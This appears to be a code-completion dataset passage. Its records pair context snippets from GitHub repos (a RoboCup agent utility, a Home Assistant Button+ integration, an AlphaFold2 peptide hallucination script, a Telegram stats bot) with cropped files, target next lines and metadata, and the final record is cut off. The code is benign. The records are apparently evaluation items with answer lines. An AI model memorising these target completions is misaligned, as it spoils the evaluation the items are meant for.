\"w\") as f:\n json.dump(self.options, f, indent=4)\n else: # load user-defined values (that can be overwritten by command-line arguments)\n if path.getsize(\"config.json\") == 0: # wait for possible write operation when launching multiple agents\n from time import sleep\n sleep(1)\n if path.getsize(\"config.json\") == 0: # abort after 1 second\n print(\"Aborting: 'config.json' is empty. Manually verify and delete if still empty.\")\n exit()\n \n with open(\"config.json\", \"r\") as f:\n self.options = json.loads(f.read())\n\n\n @staticmethod\n def build_cpp_modules(special_environment_prefix=[], exit_on_build=False):\n '''\n Build C++ modules in folder /cpp using Pybind11\n \n Parameters\n ----------\n special_environment_prefix : `list`\n command prefix to run a given command in the desired environment\n useful to compile C++ modules for different python interpreter versions (other than default version)\n Conda Env. example: ['conda', 'run', '-n', 'myEnv']\n If [] the default python interpreter is used as compilation target\n exit_on_build : bool\n exit if there is something to build (so that only 1 player per team builds c++ modules)\n '''\n cpp_path = Script.ROOT_DIR + \"/cpp/\"\n exclusions = [\"__pycache__\"]\n\n cpp_modules = [d for d in listdir(cpp_path) if isdir(join(cpp_path, d)) and d not in exclusions]\n\n if not cpp_modules: return #no modules to build\n\n python_cmd = f\"python{sys.version_info.major}.{sys.version_info.minor}\" # \"python3\" can select the wrong version, this prevents that\n\n def init():\n print(\"--------------------------\\nC++ modules:\",cpp_modules)\n\n try:\n process = subprocess.Popen(special_environment_prefix+[python_cmd, \"-m\", \"pybind11\", \"--includes\"], stdout=subprocess.PIPE)\n (includes, err) = process.communicate()\n process.wait()\n except:\n print(f\"Error while executing child program: '{python_cmd} -m pybind11 --includes'\")\n exit()\n\n includes = includes.decode().rstrip() # strip trailing newlines (and other whitespace chars)\n print(\"Using Pybind11 includes: '\",includes,\"'\",sep=\"\")\n return includes\n\n nproc = str(cpu_count())\n zero_modules = True\n\n for module in cpp_modules:\n module_path = join(cpp_path, module)\n\n # skip module if there is no Makefile (typical distribution case)\n if not isfile(join(module_path, \"Makefile\")):\n continue\n\n # skip module in certain conditions\n if isfile(join(module_path, module+\".so\")) and isfile(join(module_path, module+\".c_info\")):\n with open(join(module_path, module+\".c_info\"), 'rb') as f:\n info = pickle.load(f)\n if info == python_cmd:\n code_mod_time = max(getmtime(join(module_path, f)) for f in listdir(module_path) if f.endswith(\".cpp\") or f.endswith(\".h\"))\n bin_mod_time = getmtime(join(module_path, module+\".so\"))\n if bin_mod_time + 30 > code_mod_time: # favor not building with a margin of 30s (scenario: we unzip the fcpy project, including the binaries, the modification times are all similar)\n continue\n\n # init: print stuff & get Pybind11 includes\n if zero_modules:\n if exit_on_build:\n print(\"There are C++ modules to build. This player is not allowed to build. Aborting.\")\n exit()\n zero_modules = False\n includes = init()\n\n # build module\n print(f'{f\"Building: {module}... \":40}',end='',flush=True)\n process = subprocess.Popen(['make', '-j'+nproc, 'PYBIND_INCLUDES='+includes], stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=module_path)\n (output, err) = process.communicate()\n exit_code = process.wait()\n if exit_code == 0:\n print(\"success!\")\n with open(join(module_path, module+\".c_info\"),\"wb\") as f: # save python version\n pickle.dump(python_cmd, f, protocol=4) # protocol 4 is backward compatible with Python 3.4\n else:\n print(\"Aborting! Building errors:\")\n print(output.decode(), err.decode())\n exit() \n\n if not zero_modules:\n print(\"All modules were built successfully!\\n--------------------------\")\n\n\n def batch_create(self, agent_cls, args_per_player): \n ''' Creates batch of agents '''\n\n for a in args_per_player:\n self.players.append( agent_cls(*a) )\n\n def batch_execute_agent(self, index : slice = slice(None)): \n ''' \n Executes agent normally (including commit & send)\n\n Parameters\n ----------\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n ''' \n for p in self.players[index]:\n p.think_and_send()\n\n def batch_execute_behavior(self, behavior, index : slice = slice(None)):\n '''\n Executes behavior\n\n Parameters\n ----------\n behavior : str\n name of behavior to execute\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n '''\n for p in self.players[index]:\n p.behavior.execute(behavior)\n\n def batch_commit_and_send(self, index : slice = slice(None)):\n '''\n Commits & sends data to server\n\n Parameters\n ----------\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n '''\n for p in self.players[index]:\n p.scom.commit_and_send( p.world.robot.get_command() ) \n\n def batch_receive(self, index : slice = slice(None), update=True):\n ''' \n Waits for server messages\n\n Parameters\n ----------\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n update : bool\n update world state based on information received from server\n if False, the agent becomes unaware of itself and its surroundings\n which is useful for reducing cpu resources for dummy agents in demonstrations\n '''\n for p in self.players[index]:\n p.scom.receive(update)\n\n def batch_commit_beam(self, pos2d_and_rotation, index : slice = slice(None)):\n '''\n Beam all player to 2D position with a given rotation\n\n Parameters\n ----------\n pos2d_and_rotation : `list`\n iterable of 2D positions and rotations e.g. [(0,0,45),(-5,0,90)]\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n ''' \n for p, pos_rot in zip(self.players[index], pos2d_and_rotation): \n p.scom.commit_beam(pos_rot[0:2],pos_rot[2])\n\n def batch_unofficial_beam(self, pos3d_and_rotation, index : slice = slice(None)):\n '''\n Beam all player to 3D position with a given rotation\n\n Parameters\n ----------\n pos3d_and_rotation : `list`\n iterable of 3D positions and rotations e.g. [(0,0,0.5,45),(-5,0,0.5,90)]\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n ''' \n for p, pos_rot in zip(self.players[index], pos3d_and_rotation): \n p.scom.unofficial_beam(pos_rot[0:3],pos_rot[3])\n\n def batch_terminate(self, index : slice = slice(None)):\n '''\n Close all sockets connected to the agent port\n For scripts where the agent lives until the application ends, this is not needed\n\n Parameters\n ----------\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n '''\n for p in self.players[index]:\n p.terminate()\n del self.players[index] # delete selection"
}
] | from agent.Base_Agent import Base_Agent as Agent
from itertools import count
from scripts.commons.Script import Script
import numpy as np | 3,600 |
'''
Objective:
----------
Fall and get up
'''
class Get_Up():
|
'''
Objective:
----------
Fall and get up
'''
class Get_Up(): | def __init__(self, script:Script) -> None: | 1 | 2023-12-16 23:40:23+00:00 | 4k |
koenhendriks/ha-button-plus | custom_components/button_plus/config_flow.py | [
{
"identifier": "ApiClient",
"path": "custom_components/button_plus/button_plus_api/api_client.py",
"snippet": "class ApiClient:\n \"\"\" Client to talk to Button+ website \"\"\"\n\n def __init__(self, session, cookie=None) -> None:\n _LOGGER.debug(f\"DEBUG CONFIG {cookie}\")\n self._base = \"https://api.button.plus\"\n self._session = session\n\n if not cookie:\n cookie = \"\"\n\n self._cookie = cookie\n self._headers = {\n 'authority': 'api.button.plus',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',\n 'accept-language': 'en-NL,en-US;q=0.9,en;q=0.8,nl-NL;q=0.7,nl;q=0.6,en-GB;q=0.5',\n 'cache-control': 'no-cache',\n 'cookie': self._cookie,\n }\n\n _LOGGER.debug(f\"Initialize Button+ API client\")\n\n async def test_connection(self):\n url = f\"{self._base}/button/buttons\"\n _LOGGER.debug(f\"test_connection on {url}\")\n async with self._session.get(url, headers=self._headers) as response:\n _LOGGER.debug(f\"Fetch website validation = {response.status} {response}\")\n return 200 <= response.status < 300\n\n async def fetch_config(self, config=int):\n url = f\"{self._base}/button/config/{config}\"\n _LOGGER.debug(f\"fetch_config {url}\")\n async with self._session.get(url, headers=self._headers) as response:\n return await response.text()\n\n async def fetch_configs(self):\n url = f\"{self._base}/button/buttons\"\n _LOGGER.debug(f\"fetch_configs {url}\")\n async with self._session.get(url, headers=self._headers) as response:\n return await response.text()\n\n async def get_cookie_from_login(self, email=str, password=str):\n url = f\"{self._base}/account/login\"\n data = {\"email\": email, \"password\": password, \"remember\": True}\n json_data = json.dumps(data)\n _LOGGER.debug(f\"json dump: {json_data}\")\n headers = {\n 'accept': '*/*',\n 'accept-language': 'en-NL,en;q=0.9',\n 'content-type': 'application/json',\n 'origin': 'https://button.plus',\n 'referer': 'https://button.plus/',\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'\n }\n\n async with self._session.post(url, data=json_data, headers=headers) as response:\n response_body = await response.text()\n\n if not response.cookies:\n raise Exception(f\"Login error with username and password, response: {response_body}\")\n\n cookie_string = str(response.cookies)\n match = re.search(r'auth_cookie=[^;]+', cookie_string)\n\n auth_cookie = match.group()\n\n return auth_cookie"
},
{
"identifier": "LocalApiClient",
"path": "custom_components/button_plus/button_plus_api/local_api_client.py",
"snippet": "class LocalApiClient:\n \"\"\" Client to talk to Button+ local devices \"\"\"\n\n def __init__(self, ip_address, session) -> None:\n self._base = f\"http://{ip_address}\"\n self._session = session\n\n _LOGGER.debug(f\"Initialize Button+ local API client\")\n\n async def fetch_config(self):\n url = f\"{self._base}/config\"\n _LOGGER.debug(f\"fetch_config {url}\")\n async with self._session.get(url) as response:\n return await response.text()\n\n async def push_config(self, config):\n url = f\"{self._base}/configsave\"\n _LOGGER.debug(f\"push_config {url}\")\n async with self._session.post(url, data=config.to_json()) as response:\n return await response.text()"
},
{
"identifier": "DeviceConfiguration",
"path": "custom_components/button_plus/button_plus_api/model.py",
"snippet": "class DeviceConfiguration:\n def __init__(self, info: Info, core: Core, mqtt_buttons: List[MqttButton], mqtt_displays: List[MqttDisplay],\n mqtt_brokers: List[MqttBroker], mqtt_sensors: List[MqttSensor]):\n self.info = info\n self.core = core\n self.mqtt_buttons = mqtt_buttons\n self.mqtt_displays = mqtt_displays\n self.mqtt_brokers = mqtt_brokers\n self.mqtt_sensors = mqtt_sensors\n\n @staticmethod\n def from_json(json_data: str) -> 'DeviceConfiguration':\n data = json.loads(json_data)\n return DeviceConfiguration(\n info=Info.from_dict(data['info']),\n core=Core.from_dict(data['core']),\n mqtt_buttons=[MqttButton.from_dict(button) for button in data['mqttbuttons']],\n mqtt_displays=[MqttDisplay.from_dict(display) for display in data['mqttdisplays']],\n mqtt_brokers=[MqttBroker.from_dict(broker) for broker in data['mqttbrokers']],\n mqtt_sensors=[MqttSensor.from_dict(sensor) for sensor in data['mqttsensors']],\n )\n\n def to_json(self) -> str:\n def serialize(obj):\n if hasattr(obj, '__dict__'):\n d = obj.__dict__.copy()\n\n # Convert the root keys\n if isinstance(obj, DeviceConfiguration):\n d['mqttbuttons'] = [serialize(button) for button in d.pop('mqtt_buttons')]\n d['mqttdisplays'] = [serialize(display) for display in d.pop('mqtt_displays')]\n d['mqttbrokers'] = [serialize(broker) for broker in d.pop('mqtt_brokers')]\n d['mqttsensors'] = [serialize(sensor) for sensor in d.pop('mqtt_sensors')]\n\n if isinstance(obj, Info):\n d['id'] = d.pop('device_id')\n d['ipaddress'] = d.pop('ip_address')\n d['largedisplay'] = d.pop('large_display')\n\n elif isinstance(obj, Connector):\n d['id'] = d.pop('connector_id')\n d['type'] = d.pop('connector_type')\n\n elif isinstance(obj, Sensor):\n d['sensorid'] = d.pop('sensor_id')\n\n elif isinstance(obj, Core):\n d['autobackup'] = d.pop('auto_backup')\n d['brightnesslargedisplay'] = d.pop('brightness_large_display')\n d['brightnessminidisplay'] = d.pop('brightness_mini_display')\n d['ledcolorfront'] = d.pop('led_color_front')\n d['ledcolorwall'] = d.pop('led_color_wall')\n\n # Custom mappings for MqttButton class\n elif isinstance(obj, MqttButton):\n d['id'] = d.pop('button_id')\n d['toplabel'] = d.pop('top_label')\n d['ledcolorfront'] = d.pop('led_color_front')\n d['ledcolorwall'] = d.pop('led_color_wall')\n d['longdelay'] = d.pop('long_delay')\n d['longrepeat'] = d.pop('long_repeat')\n\n elif isinstance(obj, Topic):\n d['brokerid'] = d.pop('broker_id')\n d['eventtype'] = d.pop('event_type')\n\n elif isinstance(obj, MqttDisplay):\n d['fontsize'] = d.pop('font_size')\n d['topics'] = [serialize(topic) for topic in d['topics']]\n\n elif isinstance(obj, MqttBroker):\n d['brokerid'] = d.pop('broker_id')\n d['wsport'] = d.pop('ws_port')\n\n elif isinstance(obj, MqttSensor):\n d['sensorid'] = d.pop('sensor_id')\n d['topic'] = serialize(d['topic'])\n\n # Filter out None values\n return {k: v for k, v in d.items() if v is not None}\n else:\n return str(obj)\n\n return json.dumps(self, default=serialize, indent=4)"
},
{
"identifier": "MqttBroker",
"path": "custom_components/button_plus/button_plus_api/model.py",
"snippet": "class MqttBroker:\n def __init__(self, broker_id: str, url: str, port: int, ws_port: int, username: str, password: str):\n self.broker_id = broker_id\n self.url = url\n self.port = port\n self.ws_port = ws_port\n self.username = username\n self.password = password\n\n @staticmethod\n def from_dict(data: Dict[str, Any]) -> 'MqttBroker':\n return MqttBroker(\n broker_id=data['brokerid'],\n url=data['url'],\n port=data['port'],\n ws_port=data['wsport'],\n username=data['username'],\n password=data['password']\n )"
},
{
"identifier": "EventType",
"path": "custom_components/button_plus/button_plus_api/event_type.py",
"snippet": "class EventType(int, Enum):\n CLICK = 0\n LONG_PRESS = 1\n BLUE_LED = 8\n RED_LED = 9\n GREEN_LED = 10\n LABEL = 11\n TOPLABEL = 12\n RGB_LED = 13\n LED = 14\n VALUE = 15\n UNIT = 17\n SENSOR_VALUE = 18"
},
{
"identifier": "DOMAIN",
"path": "custom_components/button_plus/const.py",
"snippet": "DOMAIN = \"button_plus\""
}
] | import ipaddress
import json
import logging
import traceback
import voluptuous as vol
from json import JSONDecodeError
from homeassistant import config_entries, exceptions
from homeassistant.const import CONF_IP_ADDRESS, CONF_EMAIL, CONF_PASSWORD, CONF_HOST
from homeassistant.helpers import aiohttp_client
from .button_plus_api.api_client import ApiClient
from .button_plus_api.local_api_client import LocalApiClient
from .button_plus_api.model import DeviceConfiguration, MqttBroker
from .button_plus_api.event_type import EventType
from homeassistant.helpers.network import get_url
from .const import DOMAIN # pylint:disable=unused-import | 2,917 | """Config flow for Hello World integration."""
from __future__ import annotations
_LOGGER = logging.getLogger(__name__)
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for Button+."""
local_brokers = [
"core-mosquitto",
"127.0.0.1",
"localhost"
]
def __init__(self):
self.mqtt_entry = None
self.broker_endpoint = None
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH
async def async_step_user(self, user_input=None):
"""Handle the initial Button+ setup, showing the 2 options and checking the MQTT integration."""
errors = {}
mqtt_entries = self.hass.config_entries.async_entries(domain="mqtt")
if len(mqtt_entries) < 1:
mqtt_url = f'{get_url(self.hass)}/config/integrations/integration/mqtt'
return self.async_abort(
reason="mqtt_not_enabled",
description_placeholders={
"mqtt_integration_link": mqtt_url
})
mqtt_entry = mqtt_entries[0]
broker = self.get_mqtt_endpoint(mqtt_entry.data.get("broker"))
broker_port = mqtt_entry.data.get("port")
broker_username = mqtt_entry.data.get("username", "(No authentication)")
self.mqtt_entry = mqtt_entry
if user_input is not None:
self.broker_endpoint = user_input.get("broker", broker)
return await self.async_step_choose_entry()
return self.async_show_form(
step_id="user",
data_schema=vol.Schema({
vol.Required("broker", default=broker): str
}),
errors=errors,
description_placeholders={
"mqtt_broker": broker,
"mqtt_broker_port": broker_port,
"mqtt_user": broker_username
}
)
async def async_step_choose_entry(self, user_input=None):
errors = {}
# if user_input is not None:
return self.async_show_menu(
step_id="choose_entry",
menu_options=["fetch_website", "manual"],
description_placeholders={}
)
async def async_step_manual(self, user_input=None):
""" Handle setting up button plus from manual IP."""
errors = {}
ip = None
if user_input is not None:
ip = user_input.get(CONF_IP_ADDRESS, None)
valid = self.validate_ip(ip)
if valid:
try:
_LOGGER.debug(f"Fetching button+ device at {ip}")
| """Config flow for Hello World integration."""
from __future__ import annotations
_LOGGER = logging.getLogger(__name__)
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for Button+."""
local_brokers = [
"core-mosquitto",
"127.0.0.1",
"localhost"
]
def __init__(self):
self.mqtt_entry = None
self.broker_endpoint = None
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH
async def async_step_user(self, user_input=None):
"""Handle the initial Button+ setup, showing the 2 options and checking the MQTT integration."""
errors = {}
mqtt_entries = self.hass.config_entries.async_entries(domain="mqtt")
if len(mqtt_entries) < 1:
mqtt_url = f'{get_url(self.hass)}/config/integrations/integration/mqtt'
return self.async_abort(
reason="mqtt_not_enabled",
description_placeholders={
"mqtt_integration_link": mqtt_url
})
mqtt_entry = mqtt_entries[0]
broker = self.get_mqtt_endpoint(mqtt_entry.data.get("broker"))
broker_port = mqtt_entry.data.get("port")
broker_username = mqtt_entry.data.get("username", "(No authentication)")
self.mqtt_entry = mqtt_entry
if user_input is not None:
self.broker_endpoint = user_input.get("broker", broker)
return await self.async_step_choose_entry()
return self.async_show_form(
step_id="user",
data_schema=vol.Schema({
vol.Required("broker", default=broker): str
}),
errors=errors,
description_placeholders={
"mqtt_broker": broker,
"mqtt_broker_port": broker_port,
"mqtt_user": broker_username
}
)
async def async_step_choose_entry(self, user_input=None):
errors = {}
# if user_input is not None:
return self.async_show_menu(
step_id="choose_entry",
menu_options=["fetch_website", "manual"],
description_placeholders={}
)
async def async_step_manual(self, user_input=None):
""" Handle setting up button plus from manual IP."""
errors = {}
ip = None
if user_input is not None:
ip = user_input.get(CONF_IP_ADDRESS, None)
valid = self.validate_ip(ip)
if valid:
try:
_LOGGER.debug(f"Fetching button+ device at {ip}") | api_client = LocalApiClient(ip, aiohttp_client.async_get_clientsession(self.hass)) | 1 | 2023-12-18 15:14:21+00:00 | 4k |
RosettaCommons/AF2_peptide_hallucination | run.py | [
{
"identifier": "select_positions",
"path": "util/util.py",
"snippet": "def select_positions(n_mutations, boundcomplex, select_positions, select_position_params):\n '''\n Select mutable positions in the binder based on a specific method.\n Returns a dictionary of binder with associated array indicating mutable positions.\n '''\n\n mutable_positions = {}\n\n if select_positions == 'random':\n # Choose positions randomly.\n mutable_positions['binder'] = np.random.choice(range(len(boundcomplex.current_binder_seq)), size=n_mutations, replace=False)\n\n elif select_positions == 'plddt':\n # Choose positions based on lowest plddt in binder sequence.\n # First/last three positions of binder are choice frequency adjusted to avoid picking N/C term every time (they tend to score much lower).\n\n mutate_plddt_quantile = 0.5 # default worst pLDDT quantile to mutate.\n \n # Get plddts from sequence object (binder) \n plddts = boundcomplex.current_prediction_results[\"plddt\"]\n \n # Take just binder segment\n plddts = plddts[:boundcomplex.binder_length,]\n \n # Weights associated with each position in the binder.\n # to account for termini systematically scoring worse in pLDDT.\n weights = np.array([0.25, 0.5, 0.75] + [1] * (boundcomplex.binder_length - 6) + [0.75, 0.5, 0.25])\n\n n_potential = round(boundcomplex.binder_length * mutate_plddt_quantile)\n potential_sites = np.argsort(plddts)[:n_potential]\n\n # Select mutable sites\n sub_w = weights[potential_sites]\n sub_w = [w/np.sum(sub_w) for w in sub_w]\n sites = np.random.choice(potential_sites, size=n_mutations, replace=False, p=sub_w)\n\n mutable_positions['binder'] = sites\n\n return mutable_positions"
},
{
"identifier": "util",
"path": "util/util.py",
"snippet": "def select_positions(n_mutations, boundcomplex, select_positions, select_position_params):\ndef get_aa_freq(AA_freq: dict, exclude_AA: str):\ndef initialize_MCMC(conf):\ndef initialize_score_file(conf) -> None:\ndef append_score_file(i, accepted, T, n_mutations, try_loss, try_scores, conf) -> None:\ndef accept_or_reject(boundcomplex, T, step):\ndef write_outputs(boundcomplex, conf, i) -> None:\ndef relabel_chains(pdb_lines):\n M = np.linspace(int(Mi), int(Mf), conf.hallucination.steps) # stepped linear decay of the mutation rate"
},
{
"identifier": "compute_loss",
"path": "util/loss.py",
"snippet": "def compute_loss(conf, boundcomplex):\n \"\"\"\n Computes losses as defined by the config file\n \"\"\"\n losses=OrderedDict()\n for loss_name in conf:\n loss_function = globals().get(loss_name, None)\n if loss_function is not None and callable(loss_function):\n losses[loss_name] = loss_function(boundcomplex)\n else:\n raise ValueError(f\"Loss function {loss_name} not found\")\n total_loss=combine_loss(losses, conf)\n return total_loss, losses"
}
] | import os
import sys
import numpy as np
import hydra
import copy
from submodules.oligomer_hallucination.oligomer_hallucination import Protomers, Oligomer
from submodules.oligomer_hallucination.oligomer_hallucination import AA_FREQ
from submodules.oligomer_hallucination.modules.af2_net import setup_models, predict_structure
from submodules.oligomer_hallucination.modules.mutations import mutate
from util.util import select_positions
from util import util
from util.loss import compute_loss
from omegaconf import DictConfig, OmegaConf
from hydra.core.hydra_config import HydraConfig | 1,786 |
class BoundComplex(Protomers, Oligomer):
'''
Class for keeping track of binder sequence and complex predictions
during binder hallucination.
'''
def __init__(self, target_sequence: str, name, length=70, aa_freq={}, binder_sequence=None):
"""
target_sequence: amino acid sequence of target peptide (to bind)
length: length of binder peptide
binder_sequence: Optional, starting amino acid sequence of the binder
aa_freq: dictonary containing the frequencies of each aa
"""
self.target_seq = target_sequence.upper()
assert len(self.target_seq) > 0, "Target sequence must be provided"
self.length = int(length)
self.aa_freq = aa_freq
# Get initial binder sequence
if binder_sequence:
assert self.length > 0, "Binder length must be greater than 0"
self.init_binder_seq = binder_sequence.upper()
else:
self.init_binder_seq = ''.join(np.random.choice(list(aa_freq.keys()), size = length, p=list(aa_freq.values())))
self.binder_length = len(self.init_binder_seq)
self.target_length = len(self.target_seq)
self.chain_Ls = [self.binder_length, self.target_length]
self.init_bound_seq = self.init_binder_seq + self.target_seq
self.bound_length = len(self.init_bound_seq)
# Initialize current and try sequences,
self.current_binder_seq = self.init_binder_seq
self.try_binder_seq = self.init_binder_seq
self.current_bound_seq = self.init_bound_seq
self.try_seq = self.init_bound_seq
self.name=name
def init_scores(self, scores):
'''Initalise scores'''
self.init_scores = scores
self.current_scores = scores
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores. '''
self.current_scores = self.try_scores
def assign_scores(self, scores):
'''Assign try scores. '''
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores.'''
self.current_scores = copy.deepcopy(self.try_scores)
@hydra.main(version_base=None, config_path='config', config_name='base')
def main(conf: HydraConfig) -> None:
"""
Main function for running peptide binder hallucination.
"""
input_conf=conf.input
output_conf=conf.output
loss_conf=conf.loss
model_conf=conf.model
hallucination_conf=conf.hallucination
os.makedirs(output_conf.out_dir, exist_ok=True)
if output_conf.cautious and os.path.exists(f'{output_conf.out_dir}/{output_conf.out_prefix}_step_00000.pdb'):
sys.exit(f'Specified output already exists. Exiting. To overwrite, provide output.cautious=False')
AA_freq=util.get_aa_freq(AA_FREQ, hallucination_conf.exclude_AA)
# Initialize BoundComplex object
boundcomplex = BoundComplex(target_sequence=input_conf.target_sequence, name=conf.output.out_prefix, length=input_conf.binder_length, aa_freq=AA_freq, binder_sequence=input_conf.binder_sequence)
# Setup AlphaFold2 models.
model_runners= setup_models(['complex'], model_id=model_conf.model, recycles=model_conf.recycles)
# Initialize MCMC
M, current_loss, current_scores = util.initialize_MCMC(conf)
# Initialize output file
util.initialize_score_file(conf)
# Run the hallucination trajectory
for i in range(hallucination_conf.steps):
# Update a few things.
T = hallucination_conf.T_init * (np.exp(np.log(0.5) / hallucination_conf.half_life) ** i) # update temperature
n_mutations = round(M[i]) # update mutation rate
if i == 0:
# Do initial prediction without mutations
print(f"{'-'*100}")
print('Starting...')
af2_prediction= predict_structure(boundcomplex,
single_chain=False,
model_runner=model_runners['complex'],
random_seed=0)
boundcomplex.init_prediction(af2_prediction)
|
class BoundComplex(Protomers, Oligomer):
'''
Class for keeping track of binder sequence and complex predictions
during binder hallucination.
'''
def __init__(self, target_sequence: str, name, length=70, aa_freq={}, binder_sequence=None):
"""
target_sequence: amino acid sequence of target peptide (to bind)
length: length of binder peptide
binder_sequence: Optional, starting amino acid sequence of the binder
aa_freq: dictonary containing the frequencies of each aa
"""
self.target_seq = target_sequence.upper()
assert len(self.target_seq) > 0, "Target sequence must be provided"
self.length = int(length)
self.aa_freq = aa_freq
# Get initial binder sequence
if binder_sequence:
assert self.length > 0, "Binder length must be greater than 0"
self.init_binder_seq = binder_sequence.upper()
else:
self.init_binder_seq = ''.join(np.random.choice(list(aa_freq.keys()), size = length, p=list(aa_freq.values())))
self.binder_length = len(self.init_binder_seq)
self.target_length = len(self.target_seq)
self.chain_Ls = [self.binder_length, self.target_length]
self.init_bound_seq = self.init_binder_seq + self.target_seq
self.bound_length = len(self.init_bound_seq)
# Initialize current and try sequences,
self.current_binder_seq = self.init_binder_seq
self.try_binder_seq = self.init_binder_seq
self.current_bound_seq = self.init_bound_seq
self.try_seq = self.init_bound_seq
self.name=name
def init_scores(self, scores):
'''Initalise scores'''
self.init_scores = scores
self.current_scores = scores
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores. '''
self.current_scores = self.try_scores
def assign_scores(self, scores):
'''Assign try scores. '''
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores.'''
self.current_scores = copy.deepcopy(self.try_scores)
@hydra.main(version_base=None, config_path='config', config_name='base')
def main(conf: HydraConfig) -> None:
"""
Main function for running peptide binder hallucination.
"""
input_conf=conf.input
output_conf=conf.output
loss_conf=conf.loss
model_conf=conf.model
hallucination_conf=conf.hallucination
os.makedirs(output_conf.out_dir, exist_ok=True)
if output_conf.cautious and os.path.exists(f'{output_conf.out_dir}/{output_conf.out_prefix}_step_00000.pdb'):
sys.exit(f'Specified output already exists. Exiting. To overwrite, provide output.cautious=False')
AA_freq=util.get_aa_freq(AA_FREQ, hallucination_conf.exclude_AA)
# Initialize BoundComplex object
boundcomplex = BoundComplex(target_sequence=input_conf.target_sequence, name=conf.output.out_prefix, length=input_conf.binder_length, aa_freq=AA_freq, binder_sequence=input_conf.binder_sequence)
# Setup AlphaFold2 models.
model_runners= setup_models(['complex'], model_id=model_conf.model, recycles=model_conf.recycles)
# Initialize MCMC
M, current_loss, current_scores = util.initialize_MCMC(conf)
# Initialize output file
util.initialize_score_file(conf)
# Run the hallucination trajectory
for i in range(hallucination_conf.steps):
# Update a few things.
T = hallucination_conf.T_init * (np.exp(np.log(0.5) / hallucination_conf.half_life) ** i) # update temperature
n_mutations = round(M[i]) # update mutation rate
if i == 0:
# Do initial prediction without mutations
print(f"{'-'*100}")
print('Starting...')
af2_prediction= predict_structure(boundcomplex,
single_chain=False,
model_runner=model_runners['complex'],
random_seed=0)
boundcomplex.init_prediction(af2_prediction) | try_loss, try_scores = compute_loss(loss_conf, boundcomplex) | 2 | 2023-12-21 12:07:25+00:00 | 4k |
Dank-del/stats-bot | stats_bot/__main__.py | [
{
"identifier": "start",
"path": "stats_bot/handlers/start.py",
"snippet": "async def start(update: Update, _: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"\n Sends a welcome message to the user.\n\n Args:\n update (Update): The update object containing information about the incoming message.\n context (ContextTypes.DEFAULT_TYPE): The context object containing bot-related information.\n\n Returns:\n None\n\n \"\"\"\n await update.effective_message.reply_text(\n \"Hi! I'm a bot that can generate statistics about your group chat. \"\n \"To get started, add me to your group and send /textstats to see the top 10 users by number of messages and average message length.\"\n )"
},
{
"identifier": "handle_update",
"path": "stats_bot/handlers/group.py",
"snippet": "async def handle_update(update: Update, _: ContextTypes.DEFAULT_TYPE) -> None:\n with Session(engine) as session:\n group = Group(\n id=update.message.chat.id,\n title=update.message.chat.title,\n username=update.message.chat.username,\n type=update.message.chat.type,\n members=await update.message.chat.get_member_count(),\n )\n session.merge(group)\n user = User(\n id=update.message.from_user.id,\n username=update.message.from_user.username,\n first_name=update.message.from_user.first_name,\n last_name=update.message.from_user.last_name,\n )\n session.merge(user)\n if not update.effective_message.from_user.is_bot:\n if update.effective_message.text:\n message = Message(\n user_id=update.message.from_user.id,\n group_id=update.message.chat.id,\n text=update.message.text,\n timestamp=update.message.date,\n )\n session.add(message)\n else:\n media = Attachment(\n user_id=update.message.from_user.id,\n group_id=update.message.chat.id,\n message_id=update.message.message_id,\n media_type=str(type(update.effective_message.effective_attachment))\n .split(\".\")[-1]\n .replace(\"'>\", \"\"),\n timestamp=update.message.date,\n )\n session.add(media)\n session.commit()\n # await update.message.reply_text(f\"You said: {update.message.text}\")"
},
{
"identifier": "attachment_stats",
"path": "stats_bot/handlers/plot.py",
"snippet": "@admin\nasync def attachment_stats(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"\n Generates a table of top 10 users by number of attachments sent,\n and plots a bar chart to visualize the data.\n\n Args:\n update (Update): The update object containing information about the incoming message.\n context (CallbackContext): The context object containing bot-related information.\n\n Returns:\n None\n \"\"\"\n msg = await update.effective_message.reply_text(\"Generating attachment stats...\")\n data = []\n # fetch this data from database\n with Session(engine) as session:\n attachments = session.exec(\n select(Attachment).where(Attachment.group_id == update.effective_chat.id)\n ).all()\n \n users = []\n for attachment in attachments:\n if attachment.user_id not in users:\n users.append(attachment.user_id)\n # print(users)\n for user in users:\n usr = session.exec(select(User).where(User.id == user)).first()\n attchs = session.exec(\n select(Attachment.media_type).where(Attachment.user_id == usr.id)\n ).all()\n data.append((usr.username or str(usr.id), len(attchs)))\n # Create a DataFrame from the attachments data\n df = pd.DataFrame(data, columns=[\"user_id\", \"attachment_count\"])\n \n print(df)\n # Sort the users by attachment count in descending order\n user_stats = df.sort_values(by=\"attachment_count\", 